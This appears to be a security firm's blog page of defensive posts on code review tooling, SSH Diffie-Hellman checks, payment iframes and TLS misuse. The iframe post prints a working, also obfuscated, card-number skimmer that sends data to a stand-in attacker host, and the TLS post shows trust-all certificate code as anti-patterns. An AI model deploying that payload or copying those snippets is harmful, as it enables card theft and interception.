Twitter
Friday
Aug212015

Enumerating .NET MVC Application Endpoints with Roslyn

When performing security code reviews of .NET web applications, one of the first goals for the reviewer should be to enumerate the external facing attack surface. For ASPX based applications this is achieved by enumerating all files with an aspx or ascx extension. Additionally, the ‘web.config’ file should be parsed for any exposed HttpModules, HttpHandlers and configured web services. Over the years, more and more applications have been transitioning to .NET MVC. With this transition the process for enumerating endpoints becomes a bit trickier.

When encountering a .NET MVC web application, Controllers handle the processing of incoming requests and are tied to exposed URL endpoints in the application. To successfully enumerate an application’s web attack surface, finding all classes that inherit from Controller base classes and enumerating their public methods is required. Additionally, .NET MVC introduces Filter Attributes that can be set at a Global, Controller (class) or Action (method) level.

For example, the DataController class in the code snippet below exposes an action named Index() that returns the current time. This action is decorated with the OutputCache action filter.

Therefore, prior to executing the code within the method, the logic of the ‘OutputCache’ action attribute will be executed first. There are out of the box Filter Attributes provided by .NET, or you can create your own. The ‘HttpGet’ attribute set on the method scopes the request to accepting only ‘GET’ requests. The ‘Route’ method defines the URL endpoint a user would need to hit in order to be routed to run the ‘Index()’ method.

Snippet 1 – Controllers\DataController.cs

public class DataController : Controller
{
	[OutputCache(Duration=10)]
	[HttpGet]
	[Route(“index”)]
	public string Index(){
		return DateTime.Now.ToString("T");
	}
}

It is very common for applications to use Filter Attributes to handle security related tasks. Some frequently observed examples of security related logic are:

  • Authentication enforcement

  • User/role based access control

  • CSRF token validation

  • Cache control headers

  • Setting of HTTP security headers

Having the ability to enumerate all exposed application endpoints and their associated Filter Attributes becomes very powerful during a manual security code review. The code reviewer will have the ability to quickly identify the application’s attack surface and identify gaps in security coverage based on the Filter Attributes assigned.

USING THE ROSYLN API

In order to perform our enumeration we used the .NET Compiler Platform (Roslyn) which provides open-source C# and Visual Basic compilers with powerful code analysis APIs. It enables building code analysis tools with the same APIs used by Visual Studio. It is a workable ‘compiler as a service’ API – that is to say that it exposes the C# compiler as an API for developers to call and work with the syntax tree. The APIs allow us to automate the enumeration process very accurately compared to simply using regex based ‘grepping’.

The Roslyn APIs are available by default within Visual Studio 2015. Alternatively, it can be installed through NuGet by installing the ‘Microsoft.CodeAnalysis’ package.

Using the APIs, we can iterate through all ‘*.cs’ files within a given directory and parse each file using the ‘CSharpSyntaxTree.ParseText’ method. This method turns the parsed file into a syntax tree that can then be analyzed.

using (var stream = File.OpenRead(path))
{
    var tree = CSharpSyntaxTree.ParseText(
        SourceText.From(stream), path: path);

    SyntaxNode root = tree.GetRoot();

In order to identify the classes that inherit from a Controller class, you can traverse the syntax tree and check the base type of the class.

public bool inheritsFromController(SyntaxNode root, String args) {
    bool isValid = false;
 
    try {
        isValid = root.DescendantNodes()
            .OfType<BaseTypeSyntax>().First().ToString()
            .Equals("ApiController") || 
        root.DescendantNodes()
            .OfType<BaseTypeSyntax>().First().ToString()
            .Equals("Controller");
     }

Retrieving the class declaration for the Controller and all of its public methods can be performed using the following code.

ClassDeclarationSyntax controller =
    root.DescendantNodes().OfType<ClassDeclarationSyntax>()
.First(); //Get all the public methods in this class IEnumerable<MethodDeclarationSyntax> methods = from m in root.DescendantNodes() .OfType<MethodDeclarationSyntax>() where m.Modifiers.ToString().Contains("public") select m;

Now that the Controller and its public methods are enumerated we can extract the attribute assigned at both the class and method levels. The attributes can be retrieved by reading the ‘AttributeLists’ value of the ClassDeclarationSyntax and/or MethodDeclarationSyntax objects.

Public methods with a route defined are potential entry points to the application and can be invoked through HTTP requests. Before invoking the code within the method, the request will be processed by the filter attributes defined globally, at the controller level and at the method level.

.NET MVC Enumeration Tool

We are releasing a tool that utilizes the Roslyn API to automate the enumeration of .NET MVC controller entry points. The tool runs against a given directory and identifies:

  • All classes that inherit from a Controller class

  • All public methods within Controller class

  • Attributes assigned to a method including the ones set at the class level

The basic usage of the script is as follows:

> DotNetMVCEnumerator.exe -h

Usage: DotNetMVCEnumerator.exe

[-d Directory To Scan  *Required]

[-a Attribute Name to Search]

[-n Attribute Name To Perform Negative Search]

[-o File Name to Output Results as CSV]

[-h Display Usage Help Text]

Sample Usage 1 - Scan code within a directory and write output to the ‘results.csv’ file.

> DotNetMVCEnumerator.exe -d “C:\Code” -o results.csv

Sample Usage 2 - Scan code and only include results of methods containing the ‘CSRFTokenValidate’ attribute filter. The output is written to the console and to the ‘results.csv’ file.

> DotNetMVCEnumerator.exe -d “C:\Code” -o results.csv -a CSRFTokenValidate

Sample Usage 3 - Scan code and only include results of methods missing the ‘Authorize’ filter attribute. The output is written to the console and to the ‘results.csv’ file.

> DotNetMVCEnumerator.exe -d “C:\Code” -o results.csv -n Authorize

The tool is very useful to quickly identify any methods that may be missing authorization controls enforced through filter attributes. The CSV output is very helpful during manual code reviews in order to:

  • Quickly identify test/debug or administrative functionality that is accidentally exposed based on the name of the Controller or method name or URL route path.

  • Identify classes that are missing filter attributes and therefore may be missing the enforcement of security controls.

  • Keep track of your manual code review progress by leaving comments in the spreadsheets as each external entry point is reviewed.

Excel can be used to perform column based filtering based on your needs. 

The source code and binary for the tool can be found on our Github repository:

https://github.com/GDSSecurity/DotNET-MVC-Enumerator

Monday
Aug032015

SSH Weak Diffie-Hellman Group Identification Tool

Introduction

The LogJam attack against the TLS protocol allows a man-in-the-middle attacker to downgrade a TLS connection such that it uses weak cipher suites (known as export cipher suites). More precisely, the attack forces a Diffie-Hellman (DH) key exchange based on a weak group. A group (multiplicative group modulo p where p is prime) is considered weak if the defining prime has a low bit length.

Many key exchange protocol implementations, including those for TLS, utilize publicly known DH groups such as the Oakley groups used for IKE. The disadvantage of employing a publicly known group is that an attacker may already have precomputed information that helps in breaking an instance of a DH key exchange relying on that group. To impede precomputation attacks, TLS implementations typically enable the configuration of unique DH groups on the server-side.

The DH key exchange protocol is not only used as part of the TLS protocol but for many other protocols including the SSH protocol. While there are test tools (e.g. the web tool from the LogJam authors or the command-line openssl tool) which check whether the LogJam vulnerability exists for TLS-based services, there are currently no test tools available for SSH.

Weak Diffie-Hellman Groups in SSH

In contrast to TLS, the SSH protocol (defined in RFC 4253) does not support export cipher suites and does not suffer from a known design flaw that enables cipher suite downgrade attacks. The SSH protocol specification requires implementations to support at the least the following two DH key exchange methods:

  • diffie-hellman-group1-sha1

  • diffie-hellman-group14-sha1

Both methods use an Oakley group; the first method uses the Oakley Group 2 of size 1024 bits and the second method uses the Oakley Group 14 of size 2048 bits.

The authors of the LogJam paper envision that it may be possible for nation states to break 1024-bit groups. Therefore, the authors recommend disabling diffie-hellman-group1-sha1 on the server-side. For example, OpenSSH allows for enabling key exchange methods through the parameter KexAlgorithms in the server configuration file. The configuration file is typically located at /etc/ssh/sshd_config.This method is also expected to be disabled by default in the imminent OpenSSH 7.0 release.

Besides the two discussed DH key exchange protocols, many SSH clients and servers implement the two additional DH group exchange methods from RFC 4419:

  • diffie-hellman-group-exchange-sha1

  • diffie-hellman-group-exchange-sha256

When using either of these methods the SSH client starts the exchange protocol by proposing a minimal, preferred, and maximal group size in bits. The server then picks “a group that best matches the client’s request”. However, RFC 4419 leaves open how the server makes this choice. Therefore, the chosen group size is implementation-dependent. Finally, the client and server execute the DH protocol to exchange a key.

The authors of the LogJam paper recommend using ECDH or generating large, unique DH groups on the server for the DH group exchange protocols. For the OpenSSH server implementation, they provide the following commands that generate unique 2048-bit DH groups:

  • ssh-keygen -G moduli-2048.candidates -b 2048

  • ssh-keygen -T moduli-2048 -f moduli-2048.candidates

The file moduli-2048 is then used to replace the system SSH moduli file, typically /etc/ssh/moduli.

The DH key exchange protocol parameters that the client and server end up using depend on both the client and server configuration. As explained in RFC 4253, both the client and server propose a list of supported key exchange algorithms (in this context, the terms protocol and algorithm are interchangeable), ordered by preference where the first algorithm is the most preferred. In simple terms, if the client and server do not prefer the same suitable algorithm, the client and server iterate over the client’s key algorithm list and choose the first algorithm that both sides support and that is compatible with the other algorithms that SSH relies upon.

Contribution

We present a tool to identify whether an SSH server configuration permits the use of a weak DH key exchange group. To determine whether an SSH client is able to exchange a key using a weak DH group, our tool attempts to connect to the server with specific client configurations. The configuration parameters include the key exchange algorithm and the minimum, preferred, and maximum group sizes. While we provide diverse test configurations, it is straightforward to add new configurations or modify the existing ones. Furthermore, the user may configure additional client parameters such as the list of preferred encryption and MAC algorithms.

Our tool can actually be considered a tool chain consisting of three components: a shell script, a patched OpenSSH client, and a Python based analysis script. The shell script we provide allows for enumerating all user-specified configurations. This script uses an OpenSSH client that has been patched to abort the network connection after completing the key exchange. Consequently, this client does not attempt to authenticate to the server. Moreover, our OpenSSH client patch allows for specifying the minimum, preferred, and maximum group size in bits through the command-line option -d (mnemonic: Diffie-Hellman). The adapted client prints important information regarding the DH key exchange. The shell script then stores this output in files. To analyze these files we provide a Python script. The shell script automatically launches this analysis script. However, it is also possible to run the analysis script later on the output files.

We chose the OpenSSH client, since it is a widely used open source SSH client implementing an extensive set of features. Moreover, these features are easy to configure using a configuration file or command-line options. In particular, we patch the latest stable version of the portable OpenSSH client (OpenSSH 6.9p1). Testing was conducted on Ubuntu 14.04 and Mac OS X Yosemite.

Example

In the following example, we run our tool against an OpenSSH 6.6.1p1 server as it is shipped with Ubuntu 14.04, i.e. the server uses the default configuration.

To run our tool, we specify the host where the server is running and optionally specify the port number (defaults to 22).

Script invocation

KEX proposal client: [email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX proposal server: [email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: [email protected]
——— SNIP ———
KEX proposal client: diffie-hellman-group-exchange-sha256
KEX proposal server: [email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: diffie-hellman-group-exchange-sha256
KEX client group sizes: min = 768, nbits = 768, max = 768
Connection closed by 127.0.0.1
KEX proposal client: diffie-hellman-group-exchange-sha256
KEX proposal server: [email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: diffie-hellman-group-exchange-sha256
KEX client group sizes: min = 1024, nbits = 1024, max = 1024
KEX server-chosen group size in bits: 1024
——— SNIP ———
KEX proposal client: diffie-hellman-group-exchange-sha256
KEX proposal server: [email protected],ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
KEX algorithm chosen: diffie-hellman-group-exchange-sha256
KEX client group sizes: min = 2048, nbits = 2048, max = 2048
KEX server-chosen group size in bits: 2048

Analysis of results

——— SNIP ———

The client proposed the following group size parameters (in bits): min=1024, nbits=1024, max=1024.

The client and server negotiated a group size of 1024 using diffie-hellman-group-exchange-sha1.

The security level is INTERMEDIATE (might be feasible to break for nation-states).

——— SNIP ———

The client proposed the following group size parameters (in bits): min=2048, nbits=2048, max=2048.

The client and server negotiated a group size of 2048 using diffie-hellman-group-exchange-sha256.

The security level is STRONG.

The trimmed output above shows that the server supports the [email protected] key exchange algorithm. Moreover, we can observe that the server closes the connection when the client requests a 768-bit group in conjunction with the diffie-hellman-group-exchange-sha256 algorithm. Another interesting finding from the output above is that the server permits DH key exchanges using a 1024-bit group. While a 1024-bit group is sufficient in many environments, attackers with nation-state size resources may be able to break the key exchange. If a higher level of security is needed a server administrator could reconfigure the SSH server and rerun our tool to validate that the configuration is as desired.

Conclusions

We presented a tool which establishes multiple connections to an SSH server, thereby enumerating through various client configurations, in order to determine whether the server allows a DH key exchange based on a weak group. We hope that our tool will be useful to check SSH servers for weak DH key exchange configurations.

The source code to the tool can be found on our Github repository:

https://github.com/GDSSecurity/SSH-Weak-DH

References

 

Monday
Jul132015

The Perils of Implementing Secure Payment IFrames

Web applications that handle sensitive data, in particular card payment information, commonly use an embedded IFrame to provide users with a seamless customer experience. This IFrame (which may be provided from a third party payment service provider) should be served from a separate domain to leverage the browser same-origin policy controls. These controls prevent direct interaction between the consuming web application and the frame processing the payment details. For example, JavaScript executing within the business application cannot read cardholder details from within the embedded payment frame. This is a common justification for removing the application from the scope of PCI-DSS assessment leaving only the (possibly third party) IFrame that handles payment card data.

This method of segregating sites which handle card data from those that don’t can be effective provided some requirements are met. The first, as mentioned above, is that the business application and payment gateway should be served from completely different domains. It is important to note that subdomains should not be used unless the security implications are fully understood as, in some cases, the same origin policy can be bypassed by changing the “document.domain” value for the page. The second requirement is that no unvalidated data is passed from the business application to the payment IFrame. This is of critical importance because it may make it possible for an attacker to read data, such as the user’s Primary Account Number, from the payment IFrame if data controllable by an attacker is processed within the context of the payment domain.

While these concepts seem simple, this second requirement is one which bears closer inspection. Ensuring that data such as text supplied by the user is not passed to the payment IFrame is an obvious security control in this scenario. There are however other situations which are sometimes overlooked in which data could be passed into the payment IFrame. It is one such example, which GDS has encountered during security assessments, that we’ll examine below - stylesheets.

In many cases the source page for the payment IFrame is a generic site which handles payments for a large number of business applications, either within the same organisation or as a service to third parties. This page is unlikely to be styled the same way as the site which is using it, which may be an issue if it is important to reassure customers that they are dealing with a trustworthy retailer, or to present a consistent brand identity. To address this it is may be important to style the payment IFrame as if it is part of the business application in which it is embedded. This can be achieved by using images and CSS files which match those used by the business application, however this opens up a potential problem.

If the image or CSS files used to style the payment IFrame are imported directly from the business application site, then an attacker who gains control over the business application, or the server it resides on, may be able to insert malicious data into these files, and consequently into the payment IFrame. This compromises the security model used by the application to isolate sensitive data and potentially brings the entire business application into scope for assessment of card data handling.

To avoid this scenario it is therefore important to ensure that all external resources used by the IFrame are only loaded from trusted locations that are not controlled by the business application or its hosting system. Any resources provided by the application or application owners should be reviewed prior to being made available from the payment domain to ensure that they are suitable.

Example Attack

The following is an example of an attack which could be carried out using a compromised CSS file.

For demonstration purposes this is what the page looks like without the style applied, the borders of the IFrame are clearly visible.

When the style from the business application is applied the page looks like this, as you can see the IFrame, though still present, is not clearly visible.

The code to include the payment IFrame in the business application is as follows:

<iframe src=”https://payment-provider.gds:4443/customer_pan.html#css=https://business-application.gds/style.css” width=”600” height=”110” frameBorder=”0”>

As can be seen the payment site is hosted on a different domain and port from the business application. This means that the restrictions of the same origin policy will apply, however the payment IFrame loads the CSS file of the business application as shown below.

If an attacker were to gain control of the business application they could change the stylesheet to insert a malicious payload, the following example is JavaScript code to extract the customer’s PAN number when the “Next” button is clicked and send it to a remote attacker controlled location.

if(document.getElementById("stealer") == null) {
  var node=document.createElement("script");
  node.setAttribute("id","stealer");
  node.text='function steal() {' + 
    'if(window.XDomainRequest) {' +
      'xmlhttp = new XDomainRequest()' +
'}
else if(window.XMLHttpRequest) {' + 'xmlhttp = new XMLHttpRequest()' +
'}
else {' +
'xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")' +
'};'
+ 'xmlhttp.open("GET",' +
'"https://attacker.gds:31337/index.html?pan="+' +
'document.getElementById("customerPan").value,' +
'false);'
+ 'xmlhttp.send();' + 'document.getElementById("payment").submit()' + '};'; document.getElementsByTagName('head')[0].appendChild(node) } try { document.getElementById("next").outerHTML=
'<input id="next2" type="button" value="Next" ' +
'onClick="steal()">
' } catch(err) { }

Making this code execute from a CSS file can be achieved using CSS expressions. These trigger when any action is performed on the page so it is necessary to verify that any new elements have not been added already and to catch any errors which may occur when replacing elements.

The following code (an encoding of the above) can be added as the first line of the style sheet to execute this attack.

@import "data:,*%7bx:expression(eval(String.fromCharCode(105,
  102, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 115, 116, 101, 97, 108, 101, 114, 34, 41, 32,
  61, 61, 32, 110, 117, 108, 108, 41, 123, 118, 97, 114, 32,
  110, 111, 100, 101, 61, 100, 111, 99, 117, 109, 101, 110,
  116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109,
  101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41,
  59, 110, 111, 100, 101, 46, 115, 101, 116, 65, 116, 116,
  114, 105, 98, 117, 116, 101, 40, 34, 105, 100, 34, 44, 34,
  115, 116, 101, 97, 108, 101, 114, 34, 41, 59, 110, 111,
  100, 101, 46, 116, 101, 120, 116, 61, 39, 102, 117, 110,
  99, 116, 105, 111, 110, 32, 115, 116, 101, 97, 108, 40, 41,
  123, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46, 88,
  68, 111, 109, 97, 105, 110, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 68, 111, 109, 97, 105, 110, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 32, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46,
  88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61, 32,
  110, 101, 119, 32, 65, 99, 116, 105, 118, 101, 88, 79, 98,
  106, 101, 99, 116, 40, 34, 77, 105, 99, 114, 111, 115, 111,
  102, 116, 46, 88, 77, 76, 72, 84, 84, 80, 34, 41, 125, 59,
  120, 109, 108, 104, 116, 116, 112, 46, 111, 112, 101, 110,
  40, 34, 71, 69, 84, 34, 44, 34, 104, 116, 116, 112, 115,
  58, 47, 47, 97, 116, 116, 97, 99, 107, 101, 114, 46, 103,
  100, 115, 58, 51, 49, 51, 51, 55, 47, 105, 110, 100, 101,
  120, 46, 104, 116, 109, 108, 63, 112, 97, 110, 61, 34, 43,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 34,
  99, 117, 115, 116, 111, 109, 101, 114, 80, 97, 110, 34, 41,
  46, 118, 97, 108, 117, 101, 44, 102, 97, 108, 115, 101, 41,
  59, 120, 109, 108, 104, 116, 116, 112, 46, 115, 101, 110,
  100, 40, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46,
  103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121,
  73, 100, 40, 34, 112, 97, 121, 109, 101, 110, 116, 34, 41,
  46, 115, 117, 98, 109, 105, 116, 40, 41, 125, 59, 39, 59,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,
  103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41,
  91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105,
  108, 100, 40, 110, 111, 100, 101, 41, 125, 59, 116, 114,
  121, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 110, 101, 120, 116, 34, 41, 46, 111, 117, 116,
  101, 114, 72, 84, 77, 76, 61, 39, 60, 105, 110, 112, 117,
  116, 32, 105, 100, 61, 34, 110, 101, 120, 116, 50, 34, 32,
  116, 121, 112, 101, 61, 34, 98, 117, 116, 116, 111, 110,
  34, 32, 118, 97, 108, 117, 101, 61, 34, 78, 101, 120, 116,
  34, 32, 111, 110, 67, 108, 105, 99, 107, 61, 34, 115, 116,
  101, 97, 108, 40, 41, 34, 62, 39, 125, 99, 97, 116, 99,
  104, 40, 101, 114, 114, 41, 123, 125)))%7D";

The following screenshot shows the screen after the customer has entered their card number, for demonstration purposes other card details are not required by this form but could also be trivially captured by an attacker.

When the “Next” button is clicked the customer’s PAN is sent to the attacker and the form is submitted. To the user it appears that nothing unusual has occurred and the normal next screen of the payment process is shown.

However the customer’s PAN has already been received by the attacker as shown below.

Caveats

There are some limitations to this particular attack, though there are other attacks which can be carried out which may not suffer the same limitations or which may work on other browsers. This implementation is limited to attacking users on Internet Explorer as it makes use of the CSS expression statement. This attack will also only normally work on Internet Explorer 7 and below, however Internet Explorer versions up to 10 (Windows 8.0), can be vulnerable. This is because Internet Explorer renders pages shown in an IFrame in the same compatibility mode as that of the parent frame. If an attacker controls the business application they can set the meta tag “<meta http-equiv=’X-UA-Compatible’ content=’IE=7’>” in the HTML header to force Internet Explorer 7 compatibility mode on the parent page, and therefore the payment provider page. In Internet Explorer 11 (Windows 7 if updated and Windows 8.1), CSS expressions are disabled for the “Internet” zone, therefore this attack would only work for sites in the “Local intranet” or “Trusted sites” zones for this version.

Saturday
Jun132015

Converting Findbugs XML to HP Fortify SCA FPR

At GDS, we frequently encounter organizations with mature Secure Development Lifecycle (SDL) processes that have integrated HP Fortify to perform static code analysis. As discussed in our previous posting, GDS often assists organizations by developing custom security checks for security issues or insecure patterns identified after manual security code review. However there are languages that Fortify does not directly support, making it difficult to integrate code written in unsupported languages into an organization’s existing analysis framework.

Scala is an example of a language that is not supported by Fortify and therefore other static analysis tools must be used to perform security checks. In a previous blog post, we discussed how the Findbugs static analysis tool can be used to perform static analysis of Scala application bytecode. How can the Findbugs scan results be incorporated into an organization’s existing HP Fortify SSC server to manage the identified vulnerabilities? We have written a lightweight Java tool that can be used to convert a Findbugs XML report into a Fortify FPR file. This will allow the Findbugs results to be submitted to the SSC server as if scanned by HP Fortify SCA.

A Fortify FPR file is a compressed archive with a well-defined internal directory structure, as shown below:

Screen Shot 2015-05-29 at 10.55.05.png

The result of the SCA analysis is stored in the audit.fvdl file in an XML format. The tool we have developed takes a Findbugs XML report and transforms it into an FPR file.

The Findbugs XML is first merged with a messages.xml file that contains the finding descriptions and recommendations, using both the Findbugs bundled findings and the GDS-developed Scala ones. It is also possible to use a custom messages.xml as input. This is particularly useful for adding new write-ups for your own custom rules for Findbugs.

The merged file is then transformed to the FVDL data structure through an XSL Transformation.

The XSLT processor takes the XML source document, plus an XSLT stylesheet, and processes them to produce an output document.

This audit.fvdl file is then added to a pre-packaged zip archive with the other required files.

In doing so, the transformation is completely decoupled from the code, and it is only dependent on the used XSLT stylesheet, which can be modified without recompiling the tool.

The application is packaged in a single runnable jar and can be used as follows:

$ java -­jar convert2FPR.jar findbugs report.xml

To supply a custom messages.xml file, usage is as follows:

$ java -­jar convert2FPR.jar findbugs messages.xml report.xml

The output file, in both cases is ./report.fpr .

The first parameter (findbugs) represents the input format and maps to the corresponding XSL (see below Java example):

static{
formats.put("findbugs","com/gds/convert2fpr/findbugs/fvdl.xsl");

}

In order to extend the tool to support further input formats, only a new XSL file and one additional line in the above code for each added XSL stylesheet are required.

The source code and compiled tool can be found on our Github Repository below:
https://github.com/GDSSecurity/Convert2FPR/

Monday
Jun082015

Fortify SCA Custom Rules for JSSE APIs Misuse

While delivering GDS secure SDLC services, we often develop a range of custom security checks and static analysis rules for detecting insecure coding patterns that we find during our source code security reviews. These patterns can represent both common security flaws or unique security weaknesses specific to either the application being assessed, its architecture/design, utilised components, or even the development team itself. These custom rules are often developed to target specific languages and be implemented within a specific static analysis tool depending on what our client is using already or most comfortable with - previous examples include FindBugs, PMD, Visual Studio and of course Fortify SCA.  

In this blog post I will be focusing on developing PoC rules for Fortify SCA to target Java based applications, however, the same concepts can easily be extended to other tools and/or development languages.

The recent vulnerability that affected Duo Mobile confirms the analysis of Georgiev et al, who demonstrate a wide range of serious security flaws are the result of an incorrect SSL/TLS certificate validation in various non-browser software, libraries and middleware.

Specifically, in this post we focus on how to identify an insecure use of the SSL/TLS APIs in Java, which could result in Man-in-the-Middle or spoofing attacks allowing a malicious host to impersonate a trusted one. The integration of HP Fortify SCA in the SDLC allows applications to be efficiently scanned for vulnerabilities on a regular basis. We found out that issues occurring due to SSL APIs misuse are not identified with the out of the box rule-sets, thus we developed a comprehensive 12 custom-rule pack for Fortify.

Secure Sockets Layer (SSL/TLS) is the most widely used protocol for secure communication over the web using cryptographic processes to provide authentication, confidentiality, and integrity. To ensure the identity of the party, X.509 certificates must be exchanged and verified. Once the parties are authenticated, the protocol provides an encrypted connection. The algorithms used for encryption in SSL include a secure hash function, which guarantees the integrity of the data.

When using SSL/TLS, the following two steps must be performed in order to ensure no man in the middle tampers with the channel:

  • Certificate Chain-Of-Trust verification: a X.509 certificate specifies the name of the certificate authority (CA) that issued the certificate. The server also sends to the client a list of certificates of the intermediate CA all the way to a root CA. The client verifies the signature, expiration (and other checks out of the scope of this post such as revocation, basic constraints, policy constraints, etc) of each certificate starting from the server’s certificate at the bottom going up to the root CA. If the algorithm reaches the last certificate in the chain, with no violations, then verification is successful.
  • Hostname Verification: after the chain of trust is established, the client must verify that the subject of the X.509 certificate matches the fully qualified DNS name of the requested server. RFC2818 prescribes to use SubjectAltNames and Common Name for backwards compatibility.

The following mis-use cases can occur when SSL/TLS APIs are not used securely and can cause an application to transmit sensitive information over a compromised SSL/TLS channel.

Trusting All Certificates

The application implements a custom TrustManager so that its logic will trust every presented server certificates without performing the Chain-Of-Trust verification.

TrustManager[] trustAllCerts = new TrustManager[] {
        new X509TrustManager() {
...
   	public void checkServerTrusted(X509Certificate[] certs, 
                 String authType){}
}

This case usually originates from development environments where self-signed Certificates are widely used. In our experiences, we commonly find developers disabling certificate validation altogether instead of loading the certificate into their keystore.This leads to this dangerous coding pattern accidentally making its way into production releases.

When this occurs, it is similar to removing the batteries from a smoke detector: the detector (validation) will still be there, providing a false sense of safety as it will not detect the smoke (un-trusted party). In fact, when a client connects to a server, the validation routine will happily accept any server certificate.

A search on GitHub for the above vulnerable code returns 13,823 results. Also on StackOverflow, a number of questions ask how to ignore certificate errors, obtaining replies similar to the above vulnerable code. It’s concerning that the most voted answers suggest to disable any trust management.

Allowing All Hostnames

The application does not check whether the digital certificate that the server sends is issued to the URL the client is connecting to.

The Java Secure Socket Extension (JSSE) provides two sets of APIs to establish secure communications, a high-level HttpsURLConnection API and a low-level SSLSocket API.

The HttpsURLConnection API performs hostname verification by default, again this can be disabled by overriding the verify() method in the corresponding HostnameVerifier class (there are around 12,800 results when searching for the below code on GitHub).

HostnameVerifier allHostsValid = new HostnameVerifier() {
public boolean verify(String hostname, SSLSession session) {
          	return true;
   	}
};

The SSLSocket API does not perform hostname verification out of the box. The below code is a Java 8 snippet, hostname verification is performed only if the endpoint identification algorithm is different from an empty String or a NULL value.

private void checkTrusted(X509Certificate[] chain, String authType, SSLEngine engine, boolean isClient) 
throws CertificateException{
  ...
  String identityAlg = engine.getSSLParameters().
            getEndpointIdentificationAlgorithm();
  if (identityAlg != null && identityAlg.length() != 0) {
            checkIdentity(session, chain[0], identityAlg, isClient,
                    getRequestedServerNames(engine));
  }
  ...
}

When SSL/TLS clients use the raw SSLSocketFactory instead of the HttpsURLConnection wrapper, the identification algorithm is set to NULL, thus the hostname verification is silently skipped. Thus, if the attacker has a MITM position on the network when a client connects to ‘domain.com’, the application will also accept a valid server certificate issued for ‘some-evil-domain.com’.

This documented behavior is buried in the JSSE reference’s guide:

“When using raw SSLSocket and SSLEngine classes, you should always check the peer’s credentials before sending any data. The SSLSocket and SSLEngine classes do not automatically verify that the host name in a URL matches the host name in the peer’s credentials. An application could be exploited with URL spoofing if the host name is not verified.”

Our contribution: Fortify SCA Rules

To detect the above insecure usage we have coded the following checks in 12 custom rules for HP Fortify SCA. These rules identify issues in code relying on both JSSE and Apache HTTPClient since they are widely used libraries for thick clients and Android apps.

  • Over-Permissive Hostname Verifier: the rule is fired when the code declares a HostnameVerifier, and it always returns ‘true’.

<Predicate>
  <![CDATA[
Function f: f.name is "verify" and f.enclosingClass.supers 
contains [Class: name=="javax.net.ssl.HostnameVerifier" ] and 
f.parameters[0].type.name is "java.lang.String" and 
f.parameters[1].type.name is "javax.net.ssl.SSLSession" and 
f.returnType.name is "boolean" and f contains 
[ReturnStatement r: r.expression.constantValue matches "true"] 
  ]]>
</Predicate>
  • Over-Permissive Trust Manager: the rule is fired when the code declares a TrustManager and if it never throws a CertificateException. Throwing the exception is the way the API manages unexpected conditions.

<Predicate>
  <![CDATA[
Function f: f.name is "checkServerTrusted" and 
f.parameters[0].type.name is "java.security.cert.X509Certificate" 
and f.parameters[1].type.name is "java.lang.String" and 
f.returnType.name is "void" and not f contains [ThrowStatement t: 
t.expression.type.definition.supers contains [Class: name == 
"(javax.security.cert.CertificateException|java.security.cert.CertificateException)"]] 
  ]]>
</Predicate>
  • Missing Hostname Verification: the rule is fired when the code is using the Low-Level SSLSocket API and does not set a HostnameVerifier.

  • Often Misused: Custom HostnameVerifier: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom HostnameVerifier.

  • Often Misused: Custom SSLSocketFactory: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom SSLSocketFactory.

We decided to fire the “often misused” rules since the application is using the High-Level API and the overriding of these methods should be manually reviewed.

The rules pack is available on Github. These checks should always be performed during Source Code Analysis to ensure the code is not introducing an insecure SSL/TLS usage.

https://github.com/GDSSecurity/JSSE_Fortify_SCA_Rules